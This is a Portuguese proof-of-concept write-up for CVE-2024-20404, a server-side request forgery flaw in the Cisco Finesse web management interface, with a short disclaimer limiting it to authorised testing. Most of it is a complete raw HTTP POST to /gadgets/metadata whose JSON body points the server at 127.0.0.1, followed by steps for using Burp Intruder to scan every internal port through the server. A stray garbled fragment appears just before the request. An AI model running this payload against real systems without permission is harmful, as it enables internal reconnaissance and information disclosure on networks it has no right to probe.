
Exploit de prova de conceito para CVE-2024-20404 demonstrando SSRF na interface de gerenciamento baseada na web do Cisco Finesse, permitindo enumeração de portas internas e divulgação limitada de informações.
Uma vulnerabilidade na interface de gerenciamento baseada na web do Cisco Finesse pode permitir que um atacante remoto não autenticado realize um ataque SSRF em um sistema afetado.
Esta vulnerabilidade é devida à validação insuficiente da entrada fornecida pelo usuário para solicitações HTTP específicas que são enviadas a um sistema afetado. Um atacante poderia explorar esta vulnerabilidade enviando uma solicitação HTTP maliciosa para o dispositivo afetado. Uma exploração bem-sucedida poderia permitir que o atacante obtivesse informações confidenciais limitadas de serviços associados ao dispositivo afetado.
<target> pelo seu.POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

Use o intruder do Burp Suite para escanear todas as portas abertas no servidor de gerenciamento baseado na web do Cisco Finesse, alterando o número da porta de 1 a 65535.
Você verá a resposta "Connection refused" nas portas fechadas.


Isso é apenas uma Prova de Conceito (PoC) para demonstrar que a interface de gerenciamento baseada na web do Cisco Finesse é vulnerável a Server Side Request Forgery (SSRF), e esta PoC é apenas para fins educacionais. Use-a de forma responsável e apenas em sistemas com permissão explícita para teste. O uso indevido desta PoC pode resultar em consequências graves.